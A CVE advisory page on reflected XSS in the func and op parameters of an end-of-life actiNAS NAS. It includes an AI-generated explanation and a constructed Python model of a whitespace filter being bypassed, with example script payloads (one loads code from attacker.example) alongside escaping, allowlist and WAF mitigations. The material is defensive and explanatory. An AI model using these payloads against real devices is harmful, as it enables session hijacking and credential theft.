CVE-2023-51946
Description
Multiple reflected cross-site scripting (XSS) vulnerabilities in nasSvr.php in actidata actiNAS-SL-2U-8 3.2.03-SP1 allow remote attackers to inject arbitrary web script or HTML.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Reflected XSS in actiNAS SL-2U-8 3.2.03-SP1 via nasSvr.php allows remote attackers to inject arbitrary JavaScript.
Vulnerability
Multiple reflected cross-site scripting (XSS) vulnerabilities exist in nasSvr.php of actidata actiNAS-SL-2U-8 running firmware version 3.2.03-SP1. The vulnerable parameters are func and op, which reflect user input into error messages without proper sanitization. The product is end-of-life and no longer supported [1][2].
Exploitation
An unauthenticated remote attacker can exploit this by crafting a URL that carries an XSS payload in the func or op parameter and tricking a victim into opening it. The application alters payloads that contain whitespace between string delimiters, but this filter can be bypassed by loading the payload through a tag with a `src` attribute, or by writing the payload with no whitespace between the delimiters [2].
Impact
Successful exploitation allows arbitrary JavaScript execution in the victim's browser, potentially leading to session hijacking, credential theft, or defacement. The attack does not grant server-side access or privilege escalation [2].
Mitigation
The affected product is end-of-life and no patch is available [1]. Users are advised to migrate to a supported model, such as the actiNAS DX6 product family [1]. No official workaround has been provided; however, input validation or WAF rules could mitigate exploitation [2].
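The following Python model illustrates both the exploitation path described above (a reflected parameter, a filter that only alters whitespace between string delimiters, and payloads that sidestep it) and the mitigations named here (allowlist validation, output encoding, a coarse WAF rule). It is an added example constructed for this page, not code from nasSvr.php or from actidata; the filter is a hypothetical reconstruction of the described behaviour, the allowlisted values and the host `attacker.example` are assumptions, and the payloads are constructed.

```python
"""Model of the reflected-XSS pattern in this advisory: the described whitespace
filter, its bypass, and the mitigation. Constructed for this page; it is not code
from nasSvr.php or from actidata."""
import html
import re

# Hypothetical allowlist: the real values nasSvr.php accepts for func/op are
# not given on the page.
VALID_FUNC = {"login", "status"}
VALID_OP = {"get", "set"}

_QUOTED = re.compile(r'(["\'])(.*?)\1')


def whitespace_filter(value: str) -> str:
    """Hypothetical reconstruction of the vendor filter the advisory describes:
    a quoted string that contains whitespace is altered (here: emptied). It is a
    blacklist transform on the input, not output encoding, so markup that carries
    no whitespace inside quotes passes through untouched."""
    def fix(m: re.Match) -> str:
        quote, body = m.group(1), m.group(2)
        return quote + quote if re.search(r"\s", body) else m.group(0)
    return _QUOTED.sub(fix, value)


def render_error_vulnerable(func: str, op: str) -> str:
    """Vulnerable pattern: parameters are echoed into the error message with no
    HTML encoding, so any markup that survives whitespace_filter lands in the DOM."""
    func, op = whitespace_filter(func), whitespace_filter(op)
    return f'<div class="error">Unknown function "{func}" with op "{op}"</div>'


def render_error_escaped(func: str, op: str) -> str:
    """Mitigation: contextual output encoding. In an HTML text context, escaping
    < > & " ' makes the browser render the value as text only."""
    def e(s: str) -> str:
        return html.escape(s, quote=True)
    return f'<div class="error">Unknown function "{e(func)}" with op "{e(op)}"</div>'


def is_valid_request(func: str, op: str) -> bool:
    """Mitigation: allowlist validation; reject rather than echo unknown values."""
    return func in VALID_FUNC and op in VALID_OP


def waf_flags(value: str) -> bool:
    """Coarse interim rule for a WAF or reverse proxy in front of an unpatched,
    end-of-life device: no markup characters or javascript: URIs in func/op.
    A stopgap only; encoding at the output is the real fix."""
    return re.search(r'[<>"\']|javascript:', value, re.I) is not None


# Constructed payloads (attacker.example is a placeholder host).
P_WITH_SPACE = '<script>alert("hello world")</script>'        # whitespace inside quotes: filter alters it
P_NO_SPACE = '<script>alert("pwned")</script>'                # no whitespace between delimiters
P_EXTERNAL = '<script src=//attacker.example/x.js></script>'  # payload body lives off-site


def reflected_intact(func: str) -> bool:
    """True if the vulnerable renderer echoes the payload verbatim."""
    return func in render_error_vulnerable(func, "get")


if __name__ == "__main__":
    for p in (P_WITH_SPACE, P_NO_SPACE, P_EXTERNAL):
        print(f"{p!r:60} intact={reflected_intact(p)} waf_block={waf_flags(p)}")
    print(render_error_escaped(P_NO_SPACE, "get"))
```

Running the module shows that only the payload with a space inside its quotes is broken by the filter; the whitespace-free and external-`src` variants reach the page verbatim, while the escaped renderer neutralises all three regardless of the filter.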
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- actiNAS/actiNAS-SL-2U-8
- Range: = 3.2.03-SP1
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.